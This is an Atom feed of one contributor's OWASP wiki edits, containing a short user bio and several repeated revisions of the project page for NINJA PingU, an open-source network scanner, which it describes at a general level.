<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Guifre+Ruiz</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Guifre+Ruiz"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Guifre_Ruiz"/>
		<updated>2026-04-22T05:35:20Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=225673</id>
		<title>User:Guifre Ruiz</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=225673"/>
				<updated>2017-01-28T20:13:01Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Guifré is a passionate information security engineer, pentester and secure software researcher with strong academic and technical background, whose work is aimed at making the world a safer place.&lt;br /&gt;
&lt;br /&gt;
Most of his work has been open source released in several projects and/or published in papers&amp;amp;conferences. Representative samples of those can be found querying his name in google search, on his linkedin profile, on his blog and also on his twitter timeline.&lt;br /&gt;
&lt;br /&gt;
Guifré is the project lead of OWASP NINJA PingU http://owasp.github.io/NINJA-PingU and  part of the Core Development Team of the OWASP ZAP project http://zaproxy.googlecode.com&lt;br /&gt;
&lt;br /&gt;
You can Find out more about me:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on my home page[https://guif.re]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Blogger[http://guifreruiz.blogspot.com/]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Twitter[http://twitter.com/guifreruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Linkedin[http://www.linkedin.com/in/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on GitHub[https://github.com/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=225672</id>
		<title>User:Guifre Ruiz</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=225672"/>
				<updated>2017-01-28T20:12:44Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Guifré is a passionate information security engineer, pentester and secure software researcher with strong academic and technical background, whose work is aimed at making the world a safer place.&lt;br /&gt;
&lt;br /&gt;
Most of his work has been open source released in several projects and/or published in papers&amp;amp;conferences. Representative samples of those can be found querying his name in google search, on his linkedin profile, on his blog and also on his twitter timeline.&lt;br /&gt;
&lt;br /&gt;
Guifré is the project lead of OWASP NINJA PingU http://owasp.github.io/NINJA-PingU and  part of the Core Development Team of the OWASP ZAP project http://zaproxy.googlecode.com&lt;br /&gt;
&lt;br /&gt;
You can Find out more about me:&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;on Blogger[http://guifreruiz.blogspot.com/]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on my home page[https://guif.re]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Twitter[http://twitter.com/guifreruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Linkedin[http://www.linkedin.com/in/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on GitHub[https://github.com/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171743</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171743"/>
				<updated>2014-04-06T23:57:02Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Check it out at its  '''[http://owasp.github.io/NINJA-PingU/ home page]'''.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;{{#ev:youtube|_vQwPWJp8Jc?autoplay=1&amp;amp;autohide=1&amp;amp;&amp;amp;rel=0&amp;amp;start=119&amp;amp;hd=1&amp;amp;vq=hd720}}&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base at https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
'''[http://owasp.github.io/NINJA-PingU/ Home Page]'''&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.1.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
GPLv3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Detection.&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Identification.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171582</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171582"/>
				<updated>2014-04-04T11:27:10Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Check it out at its  '''[http://owasp.github.io/NINJA-PingU/ home page]'''.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;{{#ev:youtube|_vQwPWJp8Jc?autoplay=1&amp;amp;autohide=1&amp;amp;&amp;amp;rel=0&amp;amp;start=119&amp;amp;hd=1&amp;amp;vq=hd720}}&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base at https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
'''[http://owasp.github.io/NINJA-PingU/ Home Page]'''&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
GPLv3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Detection.&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Identification.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171581</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171581"/>
				<updated>2014-04-04T11:26:51Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Check it out at its  '''[http://owasp.github.io/NINJA-PingU/ home page]'''.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;{{#ev:youtube|_vQwPWJp8Jc?autoplay=1&amp;amp;autohide=1&amp;amp;&amp;amp;rel=0&amp;amp;start=119&amp;amp;hd=1&amp;amp;vq=hd720}}&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base at https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
'''[http://owasp.github.io/NINJA-PingU/ Home Page]'''&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
GPLv3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Detection.&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Identification.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171580</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171580"/>
				<updated>2014-04-04T11:26:26Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Check it out at its  '''[http://owasp.github.io/NINJA-PingU/ home page]'''.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
